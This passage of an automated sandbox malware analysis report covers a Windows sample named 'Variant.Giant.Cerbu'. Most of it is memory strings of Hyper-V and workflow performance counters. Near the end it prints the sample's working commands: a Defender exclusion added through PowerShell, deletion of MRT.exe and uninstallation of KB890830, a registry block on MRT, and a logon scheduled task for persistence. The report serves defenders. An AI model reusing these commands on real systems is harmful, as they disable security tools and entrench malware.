Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1653708046.00000245AF59A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2377021004.00000236AB074000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorc.sysO
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor.
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes8
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
Source: SgrmBroker.exe, 00000018.00000003.2375167971.00000236AB080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisors(x'bs
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration ServicefwP
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition1
Source: SgrmBroker.exe, 00000018.00000003.2374064581.00000236AB07F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Acc
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition3
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus PipesYE4
Source: SgrmBroker.exe, 00000018.00000003.2374418575.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2377462053.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2374630747.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2374902804.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2374697966.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interru
Source: SgrmBroker.exe, 00000018.00000003.2377021004.00000236AB074000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Range
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesl
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine BusLwQ
Source: SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processormui7\O
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical ProcessorGE"
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1656543805.00000245B0E4F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1653171137.00000245B0E5D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1655673640.00000245B0E5D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1651694113.00000245B0E4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Re
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1651759830.00000245B0E41000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652899480.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652596169.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652293425.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652771513.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeAPI call chain: ExitProcess graph end nodegraph_24-17770
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DBF6C0 IsDebuggerPresent,24_2_00007FF6D9DBF6C0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9CF1680 RtlReAllocateHeap,GetErrorInfo,SafeArrayDestroy,ProcessPrng,GetProcessHeap,HeapAlloc,GetErrorInfo,VariantClear,GetProcessHeap,HeapFree,VariantClear,HeapFree,HeapFree,HeapFree,HeapFree,SafeArrayDestroy,GetErrorInfo,HeapFree,HeapFree,24_2_00007FF6D9CF1680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCode function: 24_2_00007FF6D9DD8D8C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00007FF6D9DD8D8C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeNtQueryInformationProcess: Indirect: 0x7FF6D9DCF3BCJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeNtQueryInformationProcess: Indirect: 0x7FF6D9DCF455Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeNtQueryInformationProcess: Indirect: 0x7FF6D9DCDEF5Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeNtQueryInformationProcess: Indirect: 0x7FF6D9DCE06CJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeNtQueryInformationProcess: Indirect: 0x7FF60994161CJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeNtQueryInformationProcess: Indirect: 0x7FF6099414A8Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeNtQueryInformationProcess: Indirect: 0x7FF609942A25Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeNtQueryInformationProcess: Indirect: 0x7FF60994298CJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess created: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /fJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1719566246.00000245B120C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1690429758.00000245B120C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd|
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1719566246.00000245B120C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1690429758.00000245B120C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeQueries volume information: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeQueries volume information: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
